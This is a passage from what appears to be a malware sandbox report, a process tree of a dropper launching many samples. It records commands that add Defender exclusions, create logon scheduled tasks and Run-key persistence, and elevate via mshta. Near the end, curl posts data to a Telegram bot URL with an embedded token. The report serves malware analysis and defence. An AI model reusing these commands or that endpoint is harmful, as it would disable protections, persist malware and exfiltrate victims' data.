        PID:5068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4148
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:2608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:2344
- C:\Users\Admin\Desktop\Files\connector1.exe
  "C:\Users\Admin\Desktop\Files\connector1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6512
- C:\Users\Admin\Desktop\Files\TPB-1.exe
  "C:\Users\Admin\Desktop\Files\TPB-1.exe"
  2⤵
  - Executes dropped EXE
  PID:6104
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4572
- C:\Users\Admin\Desktop\Files\CrazyCoach.exe
  "C:\Users\Admin\Desktop\Files\CrazyCoach.exe"
  2⤵
  PID:4616
- C:\Users\Admin\Desktop\Files\AsyncClient.exe
  "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
  2⤵
  PID:404
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit
    3⤵
    PID:4624
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3FC3.tmp.bat""
    3⤵
    PID:5640
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5580
  - - C:\Users\Admin\AppData\Local\Temp\update.exe
      "C:\Users\Admin\AppData\Local\Temp\update.exe"
      4⤵
      PID:6036

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6900
- C:\Users\Admin\Desktop\Files\EY3.exe
  "C:\Users\Admin\Desktop\Files\EY3.exe"
  2⤵
  PID:1632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\EY3.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'EY3.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RC7'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RC7'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:20524
- C:\Users\Admin\Desktop\Files\self-injection.exe
  "C:\Users\Admin\Desktop\Files\self-injection.exe"
  2⤵
  PID:8148
- C:\Users\Admin\Desktop\Files\invoice.exe
  "C:\Users\Admin\Desktop\Files\invoice.exe"
  2⤵
  PID:10480
- C:\Users\Admin\Desktop\Files\mobix.exe
  "C:\Users\Admin\Desktop\Files\mobix.exe"
  2⤵
  PID:10796
- C:\Users\Admin\Desktop\Files\begin.exe
  "C:\Users\Admin\Desktop\Files\begin.exe"
  2⤵
  PID:11552
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:16668
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:16340
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:14272
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:5212
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:17536
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:3996
- C:\Users\Admin\Desktop\Files\7tft98wsclkd.exe
  "C:\Users\Admin\Desktop\Files\7tft98wsclkd.exe"
  2⤵
  PID:14332
- C:\Users\Admin\Desktop\Files\TrainJX2.exe
  "C:\Users\Admin\Desktop\Files\TrainJX2.exe"
  2⤵
  PID:6060
- C:\Users\Admin\Desktop\Files\alex1dskfmdsf.exe
  "C:\Users\Admin\Desktop\Files\alex1dskfmdsf.exe"
  2⤵
  PID:19908
- C:\Users\Admin\Desktop\Files\petya.exe
  "C:\Users\Admin\Desktop\Files\petya.exe"
  2⤵
  PID:23240

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6532
- C:\Users\Admin\Desktop\Files\Client-built-woprkingfr.exe
  "C:\Users\Admin\Desktop\Files\Client-built-woprkingfr.exe"
  2⤵
  PID:3060
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:7608
- C:\Users\Admin\Desktop\Files\Client-built.exe
  "C:\Users\Admin\Desktop\Files\Client-built.exe"
  2⤵
  PID:7776
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Microsoft" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Application Frame Host.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3204
- C:\Users\Admin\Desktop\Files\shell.exe
  "C:\Users\Admin\Desktop\Files\shell.exe"
  2⤵
  PID:6568
- C:\Users\Admin\Desktop\Files\Fast%20Download.exe
  "C:\Users\Admin\Desktop\Files\Fast%20Download.exe"
  2⤵
  PID:8564
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
    3⤵
    - Views/modifies file attributes
    PID:17984
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
    3⤵
    - Views/modifies file attributes
    PID:17992
- C:\Users\Admin\Desktop\Files\poY.exe
  "C:\Users\Admin\Desktop\Files\poY.exe"
  2⤵
  PID:9028
- C:\Users\Admin\Desktop\Files\MS14-068.exe
  "C:\Users\Admin\Desktop\Files\MS14-068.exe"
  2⤵
  PID:11104
- - C:\Users\Admin\Desktop\Files\MS14-068.exe
    "C:\Users\Admin\Desktop\Files\MS14-068.exe"
    3⤵
    PID:11960
- C:\Users\Admin\Desktop\Files\Server.exe
  "C:\Users\Admin\Desktop\Files\Server.exe"
  2⤵
  PID:2576
- - C:\Users\Admin\server.exe
    "C:\Users\Admin\server.exe"
    3⤵
    PID:14776
- C:\Users\Admin\Desktop\Files\pornhub_downloader.exe
  "C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
  2⤵
  PID:11772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C36A.tmp\C36B.tmp\C36C.bat C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
    3⤵
    PID:14788
  - - C:\Windows\system32\mshta.exe
      mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
      4⤵
      Access Token Manipulation: Create Process with Token
      PID:17888
- C:\Users\Admin\Desktop\Files\BYPASSLDPLAYER.exe
  "C:\Users\Admin\Desktop\Files\BYPASSLDPLAYER.exe"
  2⤵
  PID:12708

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6972
- C:\Users\Admin\Desktop\Files\client.exe
  "C:\Users\Admin\Desktop\Files\client.exe"
  2⤵
  PID:8904
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ClientRun.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ClientRun.exe
    3⤵
    PID:7540
  - - C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
      "C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
      4⤵
      PID:10488
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /flushdns
        5⤵
        Gathers network information
        
        PID:12328
- C:\Users\Admin\Desktop\Files\mimilove.exe
  "C:\Users\Admin\Desktop\Files\mimilove.exe"
  2⤵
  PID:10624
- C:\Users\Admin\Desktop\Files\game.exe
  "C:\Users\Admin\Desktop\Files\game.exe"
  2⤵
  PID:18444
- C:\Users\Admin\Desktop\Files\CoronaVirus.exe
  "C:\Users\Admin\Desktop\Files\CoronaVirus.exe"
  2⤵
  PID:21696

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6184
- C:\Users\Admin\Desktop\Files\VsGraphicsResources.exe
  "C:\Users\Admin\Desktop\Files\VsGraphicsResources.exe"
  2⤵
  PID:2220
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Proces hosta dla zadań systemu Windows" /sc ONLOGON /tr "C:\Windows\system32\3880\vsjitdebuggerui.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4876

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6652
- C:\Users\Admin\Desktop\Files\Bloxflip%20Predictor.exe
  "C:\Users\Admin\Desktop\Files\Bloxflip%20Predictor.exe"
  2⤵
  PID:6204
- - C:\Windows\Bloxflip Predictor.exe
    "C:\Windows\Bloxflip Predictor.exe"
    3⤵
    PID:9100
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
    3⤵
    - Views/modifies file attributes
    PID:9184
- C:\Users\Admin\Desktop\Files\svchost.exe
  "C:\Users\Admin\Desktop\Files\svchost.exe"
  2⤵
  PID:460
- C:\Users\Admin\Desktop\Files\sdggwsdgdrwgrwgrwgrwgrw.exe
  "C:\Users\Admin\Desktop\Files\sdggwsdgdrwgrwgrwgrwgrw.exe"
  2⤵
  PID:7260
- C:\Users\Admin\Desktop\Files\CleanerV2.exe
  "C:\Users\Admin\Desktop\Files\CleanerV2.exe"
  2⤵
  PID:3444
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:10560
- C:\Users\Admin\Desktop\Files\Test2.exe
  "C:\Users\Admin\Desktop\Files\Test2.exe"
  2⤵
  PID:9408
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    PID:13080

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6832
- C:\Users\Admin\Desktop\Files\alex1213321.exe
  "C:\Users\Admin\Desktop\Files\alex1213321.exe"
  2⤵
  PID:5128
- - C:\Users\Admin\Desktop\Files\alex1213321.exe
    "C:\Users\Admin\Desktop\Files\alex1213321.exe"
    3⤵
    PID:4328
- - C:\Users\Admin\Desktop\Files\alex1213321.exe
    "C:\Users\Admin\Desktop\Files\alex1213321.exe"
    3⤵
    PID:5316
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 844
    3⤵
    - Program crash
    PID:7472
- C:\Users\Admin\Desktop\Files\RuntimeBroker.exe
  "C:\Users\Admin\Desktop\Files\RuntimeBroker.exe"
  2⤵
  PID:2800
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:7420
- C:\Users\Admin\Desktop\Files\namu832.exe
  "C:\Users\Admin\Desktop\Files\namu832.exe"
  2⤵
  PID:7812
- - C:\Users\Admin\AppData\Roaming\namu832.exe
    "C:\Users\Admin\AppData\Roaming\namu832.exe"
    3⤵
    PID:7636
- C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe
  "C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe"
  2⤵
  PID:11096
- - C:\Users\Admin\AppData\Local\Temp\is-4J1QQ.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-4J1QQ.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$205F8,3652845,825344,C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe"
    3⤵
    PID:9292
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:10540
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:13800
- C:\Users\Admin\Desktop\Files\run.exe
  "C:\Users\Admin\Desktop\Files\run.exe"
  2⤵
  PID:16584
- C:\Users\Admin\Desktop\Files\njrat.exe
  "C:\Users\Admin\Desktop\Files\njrat.exe"
  2⤵
  PID:18116
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    PID:24380
- C:\Users\Admin\Desktop\Files\3601_2042.exe
  "C:\Users\Admin\Desktop\Files\3601_2042.exe"
  2⤵
  PID:7864
- C:\Users\Admin\Desktop\Files\Pack_Autre_ncrypt.exe
  "C:\Users\Admin\Desktop\Files\Pack_Autre_ncrypt.exe"
  2⤵
  PID:23468

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:4756
- C:\Users\Admin\Desktop\Files\oziexp.exe
  "C:\Users\Admin\Desktop\Files\oziexp.exe"
  2⤵
  PID:15996

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6464
- C:\Users\Admin\Desktop\Files\ljgksdtihd.exe
  "C:\Users\Admin\Desktop\Files\ljgksdtihd.exe"
  2⤵
  PID:5720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'ljgksdtihd';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'ljgksdtihd' -Value '"C:\Users\Admin\AppData\Roaming\ljgksdtihd.exe"' -PropertyType 'String'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6076
- C:\Users\Admin\Desktop\Files\Invoice4231284.exe
  "C:\Users\Admin\Desktop\Files\Invoice4231284.exe"
  2⤵
  PID:7652
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e89d9b3b19f1f9d9\ScreenConnect.ClientSetup.msi"
    3⤵
    PID:9836
- C:\Users\Admin\Desktop\Files\e.exe
  "C:\Users\Admin\Desktop\Files\e.exe"
  2⤵
  PID:7456
- C:\Users\Admin\Desktop\Files\RuntimeBrokerSvc.exe
  "C:\Users\Admin\Desktop\Files\RuntimeBrokerSvc.exe"
  2⤵
  PID:7136
- C:\Users\Admin\Desktop\Files\JJSPLOIT.V2.exe
  "C:\Users\Admin\Desktop\Files\JJSPLOIT.V2.exe"
  2⤵
  PID:11732
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:19028
- C:\Users\Admin\Desktop\Files\VOLATUS0.5.exe
  "C:\Users\Admin\Desktop\Files\VOLATUS0.5.exe"
  2⤵
  PID:16388
- C:\Users\Admin\Desktop\Files\HL-340.exe
  "C:\Users\Admin\Desktop\Files\HL-340.exe"
  2⤵
  PID:24408

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:1840
- C:\Users\Admin\Desktop\Files\XClient.exe
  "C:\Users\Admin\Desktop\Files\XClient.exe"
  2⤵
  PID:4952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:18184
- C:\Users\Admin\Desktop\Files\Blue-Cloner-Signed.exe
  "C:\Users\Admin\Desktop\Files\Blue-Cloner-Signed.exe"
  2⤵
  PID:8560
- - C:\Users\Admin\AppData\Local\Temp\is-30P6P.tmp\Blue-Cloner-Signed.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-30P6P.tmp\Blue-Cloner-Signed.tmp" /SL5="$205FC,16056410,995328,C:\Users\Admin\Desktop\Files\Blue-Cloner-Signed.exe"
    3⤵
    PID:6592
  - - C:\Users\Admin\Desktop\Files\Blue-Cloner-Signed.exe
      "C:\Users\Admin\Desktop\Files\Blue-Cloner-Signed.exe" /VERYSILENT
      4⤵
      PID:10324
    - - C:\Users\Admin\AppData\Local\Temp\is-MIUK8.tmp\Blue-Cloner-Signed.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MIUK8.tmp\Blue-Cloner-Signed.tmp" /SL5="$30728,16056410,995328,C:\Users\Admin\Desktop\Files\Blue-Cloner-Signed.exe" /VERYSILENT
        5⤵
        
        PID:9904
      - C:\Users\Admin\AppData\Roaming\{4408DCF6-F8CF-46C7-9F4F-00812F90192A}\AutoIt3.exe
        
        "C:\Users\Admin\AppData\Roaming\{4408DCF6-F8CF-46C7-9F4F-00812F90192A}\AutoIt3.exe" lionheartedly.a3x
        6⤵
        
        PID:20608
- C:\Users\Admin\Desktop\Files\script.exe
  "C:\Users\Admin\Desktop\Files\script.exe"
  2⤵
  PID:9312
- C:\Users\Admin\Desktop\Files\loader.exe
  "C:\Users\Admin\Desktop\Files\loader.exe"
  2⤵
  PID:9316
- C:\Users\Admin\Desktop\Files\ChromeSetup.exe
  "C:\Users\Admin\Desktop\Files\ChromeSetup.exe"
  2⤵
  PID:16528
- - C:\Windows\SystemTemp\GUM2F16.tmp\GoogleUpdate.exe
    C:\Windows\SystemTemp\GUM2F16.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
    3⤵
    PID:16860
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
      4⤵
      PID:19256
- C:\Users\Admin\Desktop\Files\Lab01-02.exe
  "C:\Users\Admin\Desktop\Files\Lab01-02.exe"
  2⤵
  PID:18108
- C:\Users\Admin\Desktop\Files\aaa%20(3).exe
  "C:\Users\Admin\Desktop\Files\aaa%20(3).exe"
  2⤵
  PID:8416

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6468
- C:\Users\Admin\Desktop\Files\alex.exe
  "C:\Users\Admin\Desktop\Files\alex.exe"
  2⤵
  PID:4940
- - C:\Users\Admin\Desktop\Files\alex.exe
    "C:\Users\Admin\Desktop\Files\alex.exe"
    3⤵
    PID:3056
- - C:\Users\Admin\Desktop\Files\alex.exe
    "C:\Users\Admin\Desktop\Files\alex.exe"
    3⤵
    PID:4280
- - C:\Users\Admin\Desktop\Files\alex.exe
    "C:\Users\Admin\Desktop\Files\alex.exe"
    3⤵
    PID:7252
- - C:\Users\Admin\Desktop\Files\alex.exe
    "C:\Users\Admin\Desktop\Files\alex.exe"
    3⤵
    PID:7576
- - C:\Users\Admin\Desktop\Files\alex.exe
    "C:\Users\Admin\Desktop\Files\alex.exe"
    3⤵
    PID:7676
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 1004
    3⤵
    - Program crash
    PID:8228
- C:\Users\Admin\Desktop\Files\mixseven.exe
  "C:\Users\Admin\Desktop\Files\mixseven.exe"
  2⤵
  PID:5520
- - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
    "C:\Users\Admin\Desktop\Files\mixseven.exe"
    3⤵
    PID:7336
- C:\Users\Admin\Desktop\Files\Serials_Checker.exe
  "C:\Users\Admin\Desktop\Files\Serials_Checker.exe"
  2⤵
  PID:7412
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c "Serials_Checker.bat"
    3⤵
    PID:7640
  - - C:\Windows\system32\mode.com
      mode con: cols=90 lines=48
      4⤵
      PID:6448
- C:\Users\Admin\Desktop\Files\Amadey.2.exe
  "C:\Users\Admin\Desktop\Files\Amadey.2.exe"
  2⤵
  PID:4616
- - C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe
    "C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe"
    3⤵
    PID:10588
- C:\Users\Admin\Desktop\Files\TORRENTOLD-1.exe
  "C:\Users\Admin\Desktop\Files\TORRENTOLD-1.exe"
  2⤵
  PID:8892
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:10056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:10172
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:9220
- C:\Users\Admin\Desktop\Files\Guide2018.exe
  "C:\Users\Admin\Desktop\Files\Guide2018.exe"
  2⤵
  PID:14972
- C:\Users\Admin\Desktop\Files\steamerx.exe
  "C:\Users\Admin\Desktop\Files\steamerx.exe"
  2⤵
  PID:19536
- C:\Users\Admin\Desktop\Files\alex111111.exe
  "C:\Users\Admin\Desktop\Files\alex111111.exe"
  2⤵
  PID:21648

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6200
- C:\Users\Admin\Desktop\Files\Amogus.exe
  "C:\Users\Admin\Desktop\Files\Amogus.exe"
  2⤵
  PID:5964
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1412
- C:\Users\Admin\Desktop\Files\FOi.exe
  "C:\Users\Admin\Desktop\Files\FOi.exe"
  2⤵
  PID:8580
- - C:\Users\Admin\AppData\Local\Temp\10nfbzpk.bk1.exe
    "C:\Users\Admin\AppData\Local\Temp\10nfbzpk.bk1.exe"
    3⤵
    PID:9084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10nfbzpk.bk1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:14728
- C:\Users\Admin\Desktop\Files\cvf.exe
  "C:\Users\Admin\Desktop\Files\cvf.exe"
  2⤵
  PID:9012
- - C:\Users\Admin\Desktop\Files\cvf.exe
    cvf.exe
    3⤵
    PID:8452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
      4⤵
      PID:10524
    - - C:\Windows\SysWOW64\nslookup.exe
        
        nslookup myip.opendns.com resolver1.opendns.com
        5⤵
        
        PID:11760
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr Address
        5⤵
        
        PID:11996
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V resolver1.opendns.com
        5⤵
        
        PID:12984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot7537474697:AAHwFMsfiTclsNjzTz2zmu3_OUp0MFYj2eY/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
      4⤵
      PID:15300
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s -X POST "https://api.telegram.org/bot7537474697:AAHwFMsfiTclsNjzTz2zmu3_OUp0MFYj2eY/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
        5⤵
        
        PID:15272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot7537474697:AAHwFMsfiTclsNjzTz2zmu3_OUp0MFYj2eY/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
      4⤵
      PID:19016
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s -X POST "https://api.telegram.org/bot7537474697:AAHwFMsfiTclsNjzTz2zmu3_OUp0MFYj2eY/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
        5⤵
        
        PID:23548
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
